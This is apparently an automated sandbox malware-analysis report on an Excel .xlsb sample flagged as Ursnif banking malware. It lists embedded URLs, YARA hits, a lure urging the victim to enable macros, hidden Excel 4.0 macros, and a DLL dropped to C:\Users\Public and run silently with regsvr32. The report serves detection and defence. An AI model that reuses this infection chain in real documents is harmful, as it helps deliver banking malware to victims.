                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://lifecycle.office.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://login.microsoftonline.com/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://login.windows.local
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://management.azure.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://management.azure.com/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://messaging.office.com/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://ncus.contentsync.
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://ncus.pagecontentsync.
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://officeapps.live.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://onedrive.live.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://onedrive.live.com/embed?
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://outlook.office.com/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://outlook.office365.com/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://powerlift.acompli.net
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://settings.outlook.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://shell.suite.office.com:1443
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://skyapi.live.net/Activity/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://staging.cortana.ai
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://store.office.cn/addinstemplate
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://store.office.com/addinstemplate
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://store.office.de/addinstemplate
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://tasks.office.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://templatelogging.office.com/client/log
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://web.microsoftstream.com/video/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://webshell.suite.office.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://wus2.contentsync.
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://wus2.pagecontentsync.
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://www.odwebp.svc.ms

                Key, Mouse, Clipboard, Microphone and Screen Capturing:

                barindex
                Yara detected UrsnifShow sources
                Source: Yara matchFile source: 00000001.00000003.714853915.00000000041D0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 1.2.regsvr32.exe.66db0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.3.regsvr32.exe.41d8d29.0.raw.unpack, type: UNPACKEDPE
                Yara detected UrsnifShow sources
                Source: Yara matchFile source: 00000001.00000003.838086006.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838133598.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838242491.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838283441.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838186200.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838303300.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838219615.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838266816.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7148, type: MEMORY

                E-Banking Fraud:

                barindex
                Yara detected UrsnifShow sources
                Source: Yara matchFile source: 00000001.00000003.714853915.00000000041D0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 1.2.regsvr32.exe.66db0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.3.regsvr32.exe.41d8d29.0.raw.unpack, type: UNPACKEDPE
                Yara detected UrsnifShow sources
                Source: Yara matchFile source: 00000001.00000003.838086006.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838133598.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838242491.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838283441.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838186200.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838303300.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838219615.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838266816.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7148, type: MEMORY

                System Summary:

                barindex
                Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                Source: Screenshot number: 4Screenshot OCR: Enable Editing 9 10 from the yellow bar above 11 12 [i] Once You have Enable Editing, please cli
                Source: Screenshot number: 4Screenshot OCR: Enable Content 13 from the yellow bar above 14 15 / , :: WHY I CANNOT OPEN THIS DOCUMENT? ' 1
                Found Excel 4.0 Macro with suspicious formulasShow sources
                Source: 6613n246zm543w.xlsbInitial sample: EXEC
                Source: 6613n246zm543w.xlsbInitial sample: CALL
                Found abnormal large hidden Excel 4.0 Macro sheetShow sources
                Source: 6613n246zm543w.xlsbInitial sample: Sheet size: 25180
                Source: 6613n246zm543w.xlsbInitial sample: Sheet size: 45240
                Source: 6613n246zm543w.xlsbInitial sample: Sheet size: 38015
                Office process drops PE fileShow sources
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\block.dllJump to dropped file
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\presentation[1].dllJump to dropped file
                Writes or reads registry keys via WMIShow sources
                Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Writes registry values via WMIShow sources
                Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DB18D1 GetProcAddress,NtCreateSection,memset,1_2_66DB18D1
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DB1B89 NtMapViewOfSection,1_2_66DB1B89
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DB2485 NtQueryVirtualMemory,1_2_66DB2485
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DB22641_2_66DB2264
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DF348A1_2_66DF348A
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DE7AD71_2_66DE7AD7
                Source: Joe Sandbox ViewDropped File: C:\Users\Public\block.dll 8A26C32848C9EA085505359F67927D1A744EC07303ED0013E592ECA6B4DF4790
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\presentation[1].dll 8A26C32848C9EA085505359F67927D1A744EC07303ED0013E592ECA6B4DF4790
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                Source: classification engineClassification label: mal100.troj.expl.evad.winXLSB@12/59@4/2
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{2CCBB9CE-342A-4F78-A4D3-93ED91BA9B6E} - OProcSessId.datJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\block.dll
                Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1260 CREDAT:17410 /prefetch:2
                Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5828 CREDAT:17410 /prefetch:2
                Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4996 CREDAT:17410 /prefetch:2
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\block.dllJump to behavior
                Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1260 CREDAT:17410 /prefetch:2Jump to behavior
                Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5828 CREDAT:17410 /prefetch:2Jump to behavior
                Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4996 CREDAT:17410 /prefetch:2Jump to behavior
                Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: 6613n246zm543w.xlsbInitial sample: OLE zip file path = xl/media/image1.png
                Source: 6613n246zm543w.xlsbInitial sample: OLE zip file path = xl/media/image2.png
                Source: 6613n246zm543w.xlsbInitial sample: OLE zip file path = xl/media/image3.png
                Source: 6613n246zm543w.xlsbInitial sample: OLE zip file path = xl/media/image4.png
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
                Source: Binary string: c:\Whether\class\156\Through\How.pdb source: block.dll.0.dr
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DB1F31 LoadLibraryA,GetProcAddress,1_2_66DB1F31
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\block.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DB2253 push ecx; ret 1_2_66DB2263
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DB2200 push ecx; ret 1_2_66DB2209
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DBFE6C push ebx; retf 1_2_66DBFE6D
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DC677F push esi; iretd 1_2_66DC678A
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DE4475 push ecx; ret 1_2_66DE4488
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DC446A push esi; ret 1_2_66DC446B
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DC2403 push ebp; retf 1_2_66DC244E
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DC243F push ebp; retf 1_2_66DC244E
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DC5B7B push eax; ret 1_2_66DC5B7C
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DC633B push edx; retf 1_2_66DC6345
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DFD33E push dword ptr [ecx+4BFFD4DAh]; retf 1_2_66DFD348
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DFE175 push ds; iretd 1_2_66DFE179
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\block.dllJump to dropped file
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\presentation[1].dllJump to dropped file
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\block.dllJump to dropped file

                Boot Survival:

                barindex
                Drops PE files to the user root directoryShow sources
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\block.dllJump to dropped file

                Hooking and other Techniques for Hiding and Protection:

                barindex
                Yara detected UrsnifShow sources
                Source: Yara matchFile source: 00000001.00000003.714853915.00000000041D0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 1.2.regsvr32.exe.66db0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.3.regsvr32.exe.41d8d29.0.raw.unpack, type: UNPACKEDPE
                Yara detected UrsnifShow sources
                Source: Yara matchFile source: 00000001.00000003.838086006.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838133598.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838242491.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838283441.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838186200.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838303300.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838219615.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838266816.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7148, type: MEMORY
                Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
